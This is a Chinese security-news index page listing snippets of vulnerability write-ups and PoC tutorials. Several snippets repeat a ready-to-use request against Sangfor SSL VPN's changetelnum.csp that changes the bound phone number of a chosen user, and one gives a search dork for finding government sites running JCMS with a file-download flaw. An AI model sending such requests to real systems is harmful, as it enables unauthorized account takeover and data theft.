target - 第 8 | CN-SEC 中文网

安全博客

深信服 SSL VPN - Pre Auth 修改绑定手机

漏洞起因：漏洞分析老版本(M7.6.1)代码放上，看不懂的直接看 POC 吧；新版本的没绕成功还在审，所以不确定是不是这个 POC123https://<path>/por/change...

01月06日171 views评论

阅读全文

安全开发

ExpDemo-JavaFX工具新增漏洞编写教程

为了提高大佬们提交PR的积极性，我也是拼了（这样我就可以名正言顺的偷懒了）0x01 选漏洞，新建文件比如 ThinkPHP2.x的任意代码执行，使用vulhub搭建漏洞https://vulhub.o...

01月03日351 views评论

阅读全文

安全文章

白嫖大法 | 编写POC之腰缠万贯

一、前言：POC&EXP什么是POC：即Proof of Concept，是业界流行的针对客户具体应用的验证性测试，根据用户对采用系统提出的性能要求和扩展需求的指标，在选用服务器上进行真实数据...

12月27日443 views评论

阅读全文

安全文章

DVWA Command Injection

0x01.Command Injection(Low)相关代码分析<?php if( isset( $_POST[ 'Submit' ] ) ) {// Get input$target = $...

03月22日116 views评论

阅读全文

安全文章

某系统从0到1的突破

0x00 简介 Target是一个需要通过SSO登录后才可以使用的系统，登录成功后可以通过该系统进入该部门其他系统。没有权限的账户无法使用，这里将记录我是如何从0权限到管理员权限的完整测试步骤。最...

02月18日134 views评论

阅读全文

安全文章

技术分享 | 某系统从0到1的突破

0x00 简介Target是一个需要通过SSO登录后才可以使用的系统，登录成功后可以通过该系统进入该部门其他系统。没有权限的账户无法使用，这里将记录我是如何从0权限到管理员权限的完整测试步骤。最终我通...

12月18日194 views评论

阅读全文

安全文章

记一次因API接口问题导致目标内网沦陷

这是酒仙桥六号部队的第 119 篇文章。全文共计1689个字，预计阅读时长6分钟。背景在跟女朋友一起散步的时候，突然接到通知，客户已经给了测试的资产范围如下...

12月02日51 views评论

阅读全文

安全文章

重置绑定📱号payload:nnhttps://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1nn注意需要登录之后才可以nn这个payload配合上上次发的推送食用，payload来自【云客侠心】[强]

09月18日398 views评论

阅读全文

漏洞｜深信服VPN 修改任意账户绑定手机号

https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TA...

09月18日安全文章1,140 views评论

阅读全文

漏洞时代

逐浪CMS通用型SQL注入持续两枚

似乎逐浪开始想完全闭源了。已经准备阻止大家进行反编译了，暂时还不知道是用什么方法，以后如果研究出来的话再说吧。所以官方别再扯什么XXX源码包了，不开源不是丢人的事情，但是忽悠客户不...

01月01日323 views评论

阅读全文

大汉版通JCMS内容管理系统任意文件下载漏洞

用这系统政府门户网站居多，上谷歌inurl:gov.cn/jcms一下，使用量不是很大.多处任意文件下载，影响版本未知，大概都影响吧。

12月31日漏洞时代3,677 views评论

阅读全文

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Privilege Escalation

40053.zip

11月21日moonsec_com1,054 views评论

阅读全文

深信服 SSL VPN - Pre Auth 修改绑定手机

ExpDemo-JavaFX工具新增漏洞编写教程

白嫖大法 | 编写POC之腰缠万贯

DVWA Command Injection

某系统从0到1的突破

技术分享 | 某系统从0到1的突破

记一次因API接口问题导致目标内网沦陷

重置绑定📱号payload:nnhttps://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1nn注意需要登录之后才可以nn这个payload配合上上次发的推送食用，payload来自【云客侠心】[强]

漏洞｜深信服VPN 修改任意账户绑定手机号

逐浪CMS通用型SQL注入持续两枚

大汉版通JCMS内容管理系统任意文件下载漏洞

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Privilege Escalation

在线咨询

微信